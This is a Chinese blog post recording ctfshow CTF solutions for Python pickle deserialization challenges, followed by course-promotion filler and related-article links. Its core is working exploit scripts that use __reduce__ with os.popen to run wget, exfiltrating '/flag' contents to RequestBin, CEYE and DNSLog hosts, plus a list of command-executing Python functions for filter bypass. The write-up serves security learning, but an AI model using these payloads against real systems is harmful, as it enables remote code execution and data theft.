2024年最新ctfshow python反序列化 刷题记录(2)

最新推荐文章于 2024-05-16 11:41:39 发布
最新推荐文章于 2024-05-16 11:41:39 发布
阅读量418 收藏 9
点赞数 4
分类专栏: 程序员 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84556837/article/details/138385339
版权 

![image-20240325162846097](https://img-blog.csdnimg.cn/img_convert/d719559fe4681a7f810be257bb442b80.png)


运行脚本后则会显示:


![image-20240325162614566](https://img-blog.csdnimg.cn/img_convert/afd7cba56fd03d374d5008124ee8ad0d.png)


此时就可以输入 Linux 命令来读取 flag 啦


![image-20240325162748641](https://img-blog.csdnimg.cn/img_convert/3e94c18f51cf3616e0be5444e85a2f84.png)


### dns 外带


#### RequestBin


网址:[RequestBin — Collect, inspect and debug HTTP requests and webhooks]( )


先点击 Create a RequestBin 获取一个 url


同样只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget http://requestbin.cn:80/1cpartx1?a=cat /flag
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


`wget`是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。


运行脚本就能得到 flag


![image-20240325170204095](https://img-blog.csdnimg.cn/img_convert/f6fa6f826336004ae6beecc72a4e2764.png)


#### CEYE


网址:[CEYE - Monitor service for security testing]( )


可以稍微参考一下这篇文章:[RCE绕过之无回显-CSDN博客]( ),也可以在 http://ceye.io/payloads 中找相对应的 payload


在 http://ceye.io/profile 下的 Identifier 可以获取对应 url


同样只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget cat /flag.zrne70.ceye.io’
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


在 http://ceye.io/records/dns 即可找到 flag


![yqftM9pg8duAUEF](https://img-blog.csdnimg.cn/img_convert/99074b52d4dba4ea66c105a0c75e9863.png)


#### DNSlog


网址:[DNSLog Platform]( )


先点击 Get SubDomain 获取一个 url


同样只需将脚本稍微改一下:

import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget cat /flag.n4jlw3.dnslog.cn’
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


运行脚本后,回到 DNSlog 平台,点击 Refresh Record 就可看到被拼接的 flag


![image-20240327153137694](https://img-blog.csdnimg.cn/img_convert/ff4503f9c9aa474853534a7d390edd68.png)


## web278


提示:过滤了 os.system


使用上题脚本即可


python 可以执行命令的函数:

eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen

文末有福利领取哦~
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

👉**一、Python所有方向的学习路线**

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。![img](https://img-blog.csdnimg.cn/c67c0f87cf9343879a1278dfb067f802.png)

👉**二、Python必备开发工具**

![img](https://img-blog.csdnimg.cn/757ca3f717df4825b7d90a11cad93bc7.png)  
👉**三、Python视频合集**

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。  
![img](https://img-blog.csdnimg.cn/31066dd7f1d245159f21623d9efafa68.png)

👉 **四、实战案例**

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。**(文末领读者福利)**  
![img](https://img-blog.csdnimg.cn/e78afb3dcb8e4da3bae5b6ffb9c07ec7.png)

👉**五、Python练习题**

检查学习结果。  
![img](https://img-blog.csdnimg.cn/280da06969e54cf180f4904270636b8e.png)

👉**六、面试资料**

我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。  
![img](https://img-blog.csdnimg.cn/a9d7c35e6919437a988883d84dcc5e58.png)

![img](https://img-blog.csdnimg.cn/5db8141418d544d3a8e9da4805b1a3f9.png)

👉因篇幅有限,仅展示部分资料,这份完整版的Python全套学习资料已经上传




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化学习资料的朋友,可以戳这里无偿获取](https://bbs.csdn.net/topics/618317507)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
100天精通Python丨黑科技篇 —— 21、大语言模型_100天精通python快速入门到黑科技
m0_60452141的博客
04-26 1148
ChatGPT 是 OpenAI 推出的一种基于 GPT-3/4 的聊天机器人。chatgpt 的颠覆性影响主要体现在提高语言交流的便捷性、个性化服务、自动化客服和教育娱乐等方面,这些应用可以为用户带来更多的便利和乐趣,同时也为企业提供了更多的服务和商机。本文收于,是由的硬核博主倾力打造,分基础知识篇和黑科技应用两大部分,欢迎订阅本专栏,订阅后可私聊进Python全栈VIP交流群(问题解答、互相帮助)还可领取20GPython视频和100本互联网行业电子书。
python 序列化和反序列化
06-30 1685
一 概述 1 为什么要序列化 因为TCP/IP协议只支持字节数组的传输,不能直接传对象。对象序列化的结果一定是字节数组!当两个进程在进行远程通信时,彼此可以发送各种类型的数据。无论是何种类型的数据,都会以二进制序列的形式在网络上传送。发送方需要把这个对象转换为字节序列,才能在网络上传送;接收方则需要把字节序列再恢复为对象。 2 序列化和反序列化 序列化(serialization):及有序...
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 726
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 1011
详细讲解pickle
Python反序列化
qq_61209261的博客
07-31 1638
python反序列化
ctfshow python反序列化 题记
2401_83089819的博客
03-25 951
先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码。在 http://ceye.io/profile 下的 Identifier 可以获取对应 url。,也可以在 http://ceye.io/payloads 中找相对应的 payload。的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。有两种方法:反弹 shell 和 的 dns 外带。
ctfshow python反序列化 题记2024最新极致干货
2401_84164503的博客
04-09 850
别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。我先来介绍一下这些东西怎么用,文末抱走。
最新ctfshow python反序列化 题记(1)
2301_82242082的博客
05-03 490
的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。在这种情况下, 是一个字典,包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数,以便服务器可以根据这些参数来处理请求。无论是还是,回显都是 backdoor here:说明是一道 ”无回显“ 的题目。有两种方法:反弹 shell 和 的 dns 外带只需将脚本稍微改一下: 然后先再 vps 上开启对应端口的监听在运行脚本(否则会报错)以1234端口为例: 运行脚本后则会显示:此时就可以输入 Linux 命令来读
algorithm_record_byPython:python题记
03-15
python题记 用于记题结果,间或会有想法暗示不够彻底,但是……尽力吧 学习资料: 有空要看看 测试…… n≤30n≤30, 指数级别, dfs+剪枝,状态压缩dp n≤100n≤100 => O(n3)O(n3),floyd,dp n≤1000n≤...
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过
2401_84132565的博客
05-16 355
Python 的 opcode(operation code)是一组原始指令,用于在 Python 解释器中执行字节码。每个 opcode都是是一个标识符,代表一种特定的操作或指令。每个 opcode 都有其特定的功能,用于执行不同的操作,例如变量加载、函数调用、数值运算、控制流程等。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~因此os中o可以存在,但是单独的o是被禁止的,因为os被替换成Os,但对后续ser_data不影响。
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过(2)
2301_82241859的博客
04-07 430
V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过(1)
2401_84009679的博客
04-12 1346
训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
三道python反序列化题目介绍
a3320315的博客
03-29 790
参考链接 从Balsn CTF pyshv学习python反序列化 源码以及wp:https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/misc python反序列化 和其他语言的序列化一样,Python 的序列化的目的也是为了保存、传递和恢复对象的方便性,在众多传递对象的方式中,序列化和反序列化可以说是最简单和最容易实现的方式。...
Python序列化和反序列化使用以及部分漏洞利用
c1ean's Blog
02-16 418
Python序列化和反序列化使用以及部分漏洞利用 最近研究了一下java和python反序列化方面的漏洞,觉得很有意思,来做一个小小的总结,(PS:以前的博客停用了,现在在CSDN上继续更新,以前的文章会慢慢的搬过来) 一.序列化与反序列化 序列化:把对象转换为字节序列的过程称为对象的序列化 反序列化:把字节序列恢复为对象的过程称为对象的反序列化。 用途:把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中,并且能在网络上传输对象的字节序列。 python中序列化通常有两种方式:pickle模块和j
基于Vue和Python的在线题网站设计源码
最新发布
10-05
该项目为基于Vue和Python开发的在线题网站设计源码,涵盖218个文件,包括68个Python源码文件、68个Python字节码文件、24个Vue组件文件、17个图像文件(JPG/PNG)、7个XML文件、6个JavaScript文件、4个JPEG文件、3...
CTF Reverse】CTFShow 逆向签到题 Writeup(反汇编)
HEX9CF的技术博客
04-29 962
1逆向题的hello world。
Python反序列化漏洞及魔术方法详细全解(链构造、自动审计工具bandit)
ran的博客
04-17 3862
魔术方法执行调用下面的代码,如果下面的代码可控的话,就可能存在反序列化漏洞。pickle.dump(obj, file) :将对象序列化后保存到文件。 pickle.load(file) :读取文件, 将文件中的序列化内容反序列化为对象。 pickle.dumps(obj) :将对象序列化成字符串格式的字节流。 pickle.loads(bytes_obj) :将字符串格式的字节流反序列化为对象。寻找LV6 -> 购买修改支付逻辑 -> 绕过admin限制需修改jwt值 -> 爆破jwt密匙 -> 重组jw
反序列化题/(ㄒoㄒ)/~~。
2301_79880442的博客
03-29 905
php反序列
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值